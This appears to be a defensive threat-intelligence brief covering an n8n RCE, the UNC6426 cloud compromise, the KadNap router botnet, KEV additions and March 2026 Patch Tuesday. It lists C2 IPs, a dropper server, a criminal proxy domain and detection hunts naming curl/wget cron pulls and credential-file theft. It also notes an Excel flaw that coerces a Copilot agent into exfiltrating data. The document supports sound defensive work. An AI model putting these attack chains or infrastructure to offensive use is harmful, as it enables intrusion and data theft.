1. n8n RCE (CVE-2025-68613) — CISA KEV, Active Exploitation Confirmed
Summary
n8n’s workflow expression evaluation sandbox is being actively exploited in the wild. CISA added CVE-2025-68613 (CVSS 9.9) to its KEV catalog on March 11 — the first n8n flaw to make the list. Over 24,700 unpatched instances remain internet-exposed, with 12,300+ in North America alone. Any authenticated user can escape the expression sandbox and execute arbitrary code with the privileges of the n8n process. A secondary critical flaw (CVE-2026-27577, CVSS 9.4) was disclosed the same day by Pillar Security, classified as “additional exploits” in the same evaluation system. FCEB agencies must patch by March 25, 2026.
What’s New (Last 24 Hours)
- CISA added CVE-2025-68613 to KEV on 2026-03-11 based on confirmed active exploitation evidence.
- Pillar Security disclosed CVE-2026-27577 (CVSS 9.4) — a second exploitable path in the same n8n expression evaluator (Hacker News, 2026-03-11).
- Shadowserver data: 24,700+ unpatched public instances as of early March 2026; no specific exploit mechanism details released publicly.
- Fixed in n8n versions 1.120.4, 1.121.1, and 1.122.0 (December 2025 patch).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| n8n process spawning unexpected child processes (shell, python, etc.) post-authentication | TTP | T1059 | EDR process telemetry | Alert on node / n8n parent process spawning interpreter children (bash, sh, python, cmd) |
Authenticated HTTP POST to n8n /rest/ or /webhook/ endpoints resulting in OS execution | TTP | T1059.007 | Web/App logs | Hunt for n8n HTTP 200 responses on /rest/workflows/ followed by unexpected outbound connections |
| Outbound connections from n8n process to external IPs following workflow execution | TTP | T1071.001 | EDR network telemetry, Proxy | Alert on n8n process initiating outbound connections to non-whitelisted IPs |
| n8n version strings < 1.120.4 in HTTP response headers or service banners | Indicator | T1190 | Asset inventory, Web server logs | Inventory exposed n8n instances; version compare against patched baseline |
/jffs/.asusrouter file creation (co-infection indicator from KEV exposure) | Indicator | T1505 | File integrity monitoring | Flag unexpected hidden files in web app directories |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
2. UNC6426: nx npm Supply Chain → GitHub OIDC → AWS Admin in 72 Hours
Summary
Google’s Cloud Threat Horizons H1 2026 report detailed a full cloud compromise executed by threat actor UNC6426 — all stemming from the August 2025 nx npm supply chain attack. The attacker leveraged stolen GitHub Personal Access Tokens (PATs) extracted by the QUIETVAULT credential stealer to abuse GitHub-to-AWS OIDC trust, escalate to AWS administrator, exfiltrate S3 data, destroy EC2/RDS production instances, and rename all victim GitHub repos to public /s1ngularity-repository-* strings. Total time from stolen token to full cloud destruction: under 72 hours.
What’s New (Last 24 Hours)
- Google Cloud Threat Horizons H1 2026 published 2026-03-11 — first public case study of UNC6426 post-compromise chain.
- Full attack path documented: QUIETVAULT stealer → GitHub PAT → Nord Stream CICD secret extraction → OIDC STS token → CloudFormation stack deploy → AdministratorAccess IAM role → S3 exfil + EC2/RDS destruction.
- Detection hints published: hunt for
CreateStack events with CAPABILITY_NAMED_IAM + AdministratorAccess policy attachment; hunt for repo rename events matching s1ngularity-repository-* pattern.
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
QUIETVAULT JavaScript credential stealer (postinstall script in trojanized nx package) | Malware | T1195.002 | EDR file/process telemetry | Alert on postinstall scripts spawning processes that read env variables or access ~/.npmrc, ~/.gitconfig, SSH key paths |
GitHub PAT exfiltration to public repo /s1ngularity-repository-1 | TTP | T1552.001 | GitHub Audit Logs | Alert on GitHub repo creation events with pattern s1ngularity-repository-*; monitor for PAT usage from anomalous geo/IP |
Nord Stream tool (--aws-role parameter) used to extract CI/CD secrets | Tool | T1552.004 | CI/CD logs, CloudTrail | Hunt for sts:AssumeRoleWithWebIdentity calls from GitHub Actions service accounts outside expected workflow context |
AWS CreateStack with CAPABILITY_NAMED_IAM + arn:aws:iam::aws:policy/AdministratorAccess | TTP | T1098 | AWS CloudTrail | Alert on cloudformation:CreateStack events attaching AdministratorAccess managed policy to new IAM roles |
GitHub repo bulk rename to s1ngularity-repository-[random] + visibility set to public | TTP | T1485 | GitHub Audit Logs | Alert on bulk repository rename events + visibility change to public within a short time window |
| EC2/RDS instance termination following IAM privilege escalation | TTP | T1485 | CloudTrail | Correlate IAM role creation events with subsequent ec2:TerminateInstances / rds:DeleteDBInstance calls |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
3. KadNap Botnet — ASUS Routers Hijacked via Kademlia DHT P2P C2
Summary
Black Lotus Labs (Lumen) has published a full analysis of KadNap, a sophisticated router botnet first detected in August 2025 that has now compromised 14,000+ edge devices — mostly ASUS routers, but also targeting any ARM/MIPS edge device with unpatched RCE vulnerabilities. What makes KadNap notable is the use of a custom Kademlia DHT (Distributed Hash Table) implementation to hide C2 server IPs inside a peer-to-peer network, making traditional blocklist-based detection useless. Infected nodes are then leased as anonymous proxies through the “Doppelgänger” criminal proxy service (believed to be a rebrand of the Faceless service that previously powered the TheMoon botnet). Over 60% of victims are US-based. Lumen has blocked all known C2 traffic and released IoCs into public feeds.
What’s New (Last 24 Hours)
- Lumen Black Lotus Labs full technical analysis published 2026-03-10 with IoCs and malware behavior.
- THN follow-up published 2026-03-12 with additional victim geographic breakdown and Doppelgänger proxy service linkage.
- Ars Technica coverage 2026-03-12 — emphasis on takedown-resistance due to DHT C2.
- Key artifacts: dropper script
aic.sh pulled from 212.104.141[.]140; persistence ELF renamed to .asusrouter; cron job runs at 55-minute mark hourly; executable renamed to kad; port 22 closed by fwr.sh and /tmp/.sose files.
- Doppelgänger proxy service:
doppelganger[.]shop — launched May/June 2025; claims 50+ country coverage.
- C2 IPs from secondary botnet version:
74.194.191[.]52, 38.59.219[.]27, 83.252.42[.]112.
- SHA-256:
691e4ec280aaff33270f33a9bb48a3fc38e2bd91c7359e687e3f0bd682f20b54
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
212.104.141[.]140 — Initial dropper C2 (aic.sh download server) | IP IOC | T1190 | Firewall/proxy logs, DNS | Block/alert on outbound connections to this IP from SOHO/edge device ranges |
74.194.191[.]52 · 38.59.219[.]27 · 83.252.42[.]112 — Secondary botnet C2 IPs | IP IOC | T1571 | Firewall, NetFlow | Alert on outbound traffic to these IPs from router/gateway management segments |
/jffs/.asusrouter — Hidden persistence script file path | File IOC | T1053.003 | File integrity monitoring, EDR | Alert on creation of .asusrouter hidden file in /jffs/ on router filesystems |
kad — ELF binary filename (Kademlia DHT implant) | File IOC | T1027 | EDR file telemetry | Alert on new ELF binary creation with filename kad on Linux/embedded systems |
| Cron job created to run at minute 55 every hour pulling remote shell script | TTP | T1053.003 | Cron/syslog, EDR | Hunt for cron entries containing external URLs or curl/wget at interval 55 |
fwr.sh / /tmp/.sose — Scripts closing SSH (port 22) and extracting C2 IP lists | TTP | T1562.004 | System logs, network monitoring | Alert on iptables DROP rules being applied to port 22 by non-administrative processes |
691e4ec280aaff33270f33a9bb48a3fc38e2bd91c7359e687e3f0bd682f20b54 — KadNap ELF SHA-256 | Hash IOC | T1027 | EDR, VirusTotal | Hash-match on file scan telemetry |
doppelganger[.]shop — Criminal proxy service domain | Domain IOC | T1090 | DNS, Proxy logs | Alert on DNS resolution or HTTP connections to this domain from enterprise egress |
| NTP query burst followed by Kademlia DHT peer lookups (non-standard UDP traffic on router) | TTP | T1071 | NetFlow, PCAP | Hunt for routers initiating high-volume UDP traffic to random IPs after NTP sync |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
4. CISA Triple KEV: SolarWinds WHD + Ivanti EPM + Workspace One SSRF
Summary
CISA added three actively exploited enterprise vulnerabilities to KEV on March 9, 2026. The most urgent: SolarWinds Web Help Desk’s AjaxProxy deserialization bug (CVE-2025-26399, CVSS 9.8) is being actively exploited by the Warlock ransomware crew for initial access. The Ivanti Endpoint Manager credential-leak auth bypass (CVE-2026-1603, CVSS 8.6) has a known exploitation IP. The legacy Workspace One SSRF (CVE-2021-22054) is being chained with other SSRF vulns in coordinated campaigns. FCEB deadline for SolarWinds patch: today, March 12, 2026. Remaining two due March 23, 2026.
What’s New (Last 24 Hours)
- CISA KEV triple-add published 2026-03-09; THN coverage 2026-03-11.
- Warlock ransomware crew confirmed as exploitation actor for CVE-2025-26399 (SolarWinds WHD AjaxProxy deserialization → RCE).
- CVE-2026-1603 exploitation IP confirmed:
103.69.224[.]98 (Ivanti EPM auth bypass).
- CVE-2021-22054 (Workspace One SSRF) being chained with other SSRF vulns — GreyNoise flagged coordinated multi-product SSRF campaign.
- FCEB deadline for SolarWinds WHD patch is today (2026-03-12).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
103.69.224[.]98 — Exploitation IP for Ivanti EPM CVE-2026-1603 auth bypass | IP IOC | T1190 | Firewall/WAF logs, Web logs | Block/alert on inbound connections from this IP to Ivanti EPM management interfaces |
HTTP POST to /helpdesk/WebObjects/Helpdesk.woa/ws/ (SolarWinds WHD AjaxProxy endpoint) with deserialization payload patterns | TTP | T1190 | Web/App logs, WAF | Alert on requests to WHD AjaxProxy endpoint with unexpected content types or large binary payloads |
| Unauthenticated outbound HTTP requests from Workspace One UEM server to internal/arbitrary IPs (SSRF) | TTP | T1090.002 | Web proxy, Firewall | Alert on UEM server initiating outbound connections to RFC1918 ranges or metadata services |
| Warlock ransomware: SolarWinds WHD exploitation for initial access → lateral movement | TTP | T1133 | Auth logs, VPN/RDP logs | Alert on administrative access from SolarWinds WHD process context; hunt for LOLBin execution under WHD service account |
| Ivanti EPM stored credential leak via unauthenticated path bypass | TTP | T1078 | Web logs, Auth logs | Hunt for successful access to Ivanti EPM API endpoints without preceding authentication events; correlate with 103.69.224[.]98 |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
5. March 2026 Patch Tuesday — Six “More Likely Exploited” LPE Flaws
Summary
March 2026 Patch Tuesday dropped 80+ patches, with zero actively exploited zero-days but six vulnerabilities rated “more likely to be exploited” — all local privilege escalation paths to SYSTEM or Admin. The most notable: ATBroker.exe (Windows Accessibility Infrastructure, CVE-2026-24291) is a particularly prized target because it escalates all the way to SYSTEM (not just Admin), capable of bypassing EDR tools. Print Spooler gets another authenticated RCE (CVE-2026-23669). Two Office RCE bugs (CVE-2026-26110 and CVE-2026-26113) are exploitable via the Preview Pane. An Excel XSS bug (CVE-2026-26144) could coerce the Copilot Agent to exfiltrate data.
What’s New (Last 24 Hours)
- Microsoft released March 2026 Patch Tuesday updates on 2026-03-11 patching 84 CVEs.
- Six LPE vulnerabilities flagged “more likely to be exploited”: CVE-2026-24289 and CVE-2026-26132 (Windows Kernel use-after-free), CVE-2026-23668 (Windows Graphics race condition), CVE-2026-24294 (SMB Server improper auth), CVE-2026-25187 (Winlogon), CVE-2026-24291 (ATBroker.exe).
- CVE-2026-24291 (ATBroker.exe): SYSTEM-level — particularly high-value for post-compromise LPE.
- CVE-2026-23669: Print Spooler authenticated RCE — another in a long line of Spooler bugs reaching weaponization.
- CVE-2026-26144: Excel XSS capable of triggering Copilot Agent data exfiltration — novel attack class.
- Two publicly disclosed (not yet exploited) zero-days: CVE-2026-21262 (SQL Server SQLAdmin priv), CVE-2026-26127 (.NET DoS).
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
ATBroker.exe spawning unexpected child processes or registry key modifications under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility | TTP | T1068 | EDR process/registry telemetry | Alert on ATBroker.exe spawning cmd/powershell children or writing registry outside expected Accessibility paths |
Print Spooler service (spoolsv.exe) spawning unexpected child processes (CVE-2026-23669) | TTP | T1068 | EDR process telemetry | Alert on spoolsv.exe spawning cmd, wscript, powershell, or cscript children |
| Kernel use-after-free exploitation patterns: process from non-SYSTEM parent acquiring SYSTEM token (CVE-2026-24289, CVE-2026-26132) | TTP | T1068 | EDR process integrity | Alert on user-mode process integrity change from Medium to System without explicit service context |
| SMB Server improper auth (CVE-2026-24294): unexpected SMB session authentication without prior Kerberos/NTLM negotiation | TTP | T1021.002 | Windows Security event logs | Alert on Event ID 4624/4625 with unusual logon type from SMB sessions targeting unpatched systems |
Winlogon (winlogon.exe) creating unexpected child processes or writing new DLL paths (CVE-2026-25187) | TTP | T1547 | EDR process/file telemetry | Alert on winlogon.exe spawning non-standard children or creating files in System32 |
Excel .xlsx file previewed in Outlook triggering network connections (CVE-2026-26110, CVE-2026-26113) | TTP | T1566.001 | Email logs, EDR network telemetry | Hunt for Excel/Outlook preview pane process initiating outbound network connections |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources